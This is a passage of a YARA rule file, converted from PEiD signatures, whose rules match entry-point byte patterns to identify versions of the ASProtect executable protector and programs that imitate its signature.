00 00 ?? 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v12_Alexey_Solodovnikov_h1_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 ?? 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v20_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? 40 00 E8 01 00 00 00 C3 C3 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 3B ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 2C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v123_RC4_build_0807_exe_Alexey_Solodovnikov_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_123_RC4_build_0807_exe_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v20: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? 40 00 E8 01 00 00 00 C3 C3 }\r\n        $b = { 68 01 ?? 40 00 E8 01 00 00 00 C3 C3 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 3B ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 2C }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_v12x_New_Strain: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? ?? ?? E8 01 ?? ?? ?? C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11_BRS: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 }\r\n        $b = { 60 E9 ?? 05 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_123_RC4_build_0807_dll_Alexey_Solodovnikov_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_10_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 01 00 00 00 90 5D 81 ED ?? ?? ?? 00 BB ?? ?? ?? 00 03 DD 2B 9D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_21x_dll_Alexey_Solodovnikov_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_2122_exe_Alexey_Solodovnikov_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n        $b = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C }\r\n        $c = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_V2X_Registered_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? ?? ?? E8 01 00 00 00 C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_ASProtect: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v123_RC1_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 53 60 BD ?? ?? ?? ?? 8D 45 ?? 8D 5D ?? E8 ?? ?? ?? ?? 8D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_11_MTE_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E9 ?? ?? ?? ?? 91 78 79 79 79 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_2122_exe_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v123_RC4_build_0807_dll_Alexey_Solodovnikov_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n        $b = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_v_If_you_know_this_version_post_on_PEiD_board_h2: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? 00 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 DD 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n        $b = { 33 C0 E9 ?? ?? FF FF ?? 1C ?? ?? 40 }\r\n        $c = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? 00 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 DD 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_SKE_21x_exe_Alexey_Solodovnikov_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_02_ASProtect: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v21x: PEiD\r\n{\r\n    strings:\r\n        $a = { BB E9 60 9C FC BF B9 F3 AA 9D 61 C3 55 8B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_123_RC4_build_0807_exe_Alexey_Solodovnikov_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_ASProtect_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_2122_dll_Alexey_Solodovnikov_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n        $b = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule AHTeam_EP_Protector_03_fake_ASProtect_10_FEUERRADER: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 60 E8 01 00 00 00 90 5D 81 ED 00 00 00 00 BB 00 00 00 00 03 DD 2B 9D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_2122_dll_Alexey_Solodovnikov_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11_MTEb_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E9 ?? 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_133_21_Registered_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? ?? ?? E8 01 00 00 00 C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_20: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? 40 00 E8 01 00 00 00 C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_23_SKE_build_0426_Beta: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 60 40 00 E8 01 00 00 00 C3 C3 0D 6C 65 3E 09 84 BB 91 89 38 D0 5A 1D 60 6D AF D5 51 2D A9 2F E1 62 D8 C1 5A 8D 6B 6E 94 A7 F9 1D 26 8C 8E FB 08 A8 7E 9D 3B 0C DF 14 5E 62 14 7D 78 D0 6E }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 1B ?? ?? ?? E9 FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11_MTEc: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 1B ?? ?? ?? E9 FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11_MTEb: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 1B E9 }\r\n        $b = { 90 60 E9 ?? 04 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_v123_RC4_build_0807_exe_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n        $b = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_20_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? 40 00 E8 01 00 00 00 C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_123_RC4_build_0807_exe_Alexey_Solodovnikov_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_11_BRS_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E9 ?? 05 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v10_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 01 00 00 00 E8 83 C4 04 E8 01 00 00 00 E9 5D 81 ED D3 22 40 00 E8 04 02 00 00 E8 EB 08 EB 02 CD 20 FF 24 24 9A 66 BE 47 46 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v12x: PEiD\r\n{\r\n    strings:\r\n        $a = { 00 00 68 01 ?? ?? ?? C3 AA }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_V2X_DLL_Alexey_Solodovnikov_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 ?? ?? 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ?? ?? ?? ?? 03 DD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_02_ASProtect: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_21x_dll_Alexey_Solodovnikov_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_02_ASProtect_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_123_RC4_build_0807_dll_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_23_Alexey_Solodovnikov_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 E5 0B 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_21x_dll_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11_MTE: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E9 ?? ?? ?? ?? 91 78 79 79 79 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v10: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 01 ?? ?? ?? 90 5D 81 ED ?? ?? ?? ?? BB ?? ?? ?? ?? 03 DD 2B 9D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E9 ?? 04 ?? ?? E9 ?? ?? ?? ?? ?? ?? ?? EE }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v12: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 C3 AA ?? }\r\n        $b = { 68 01 ?? ?? ?? C3 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_v_If_you_know_this_version_post_on_PEiD_board_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 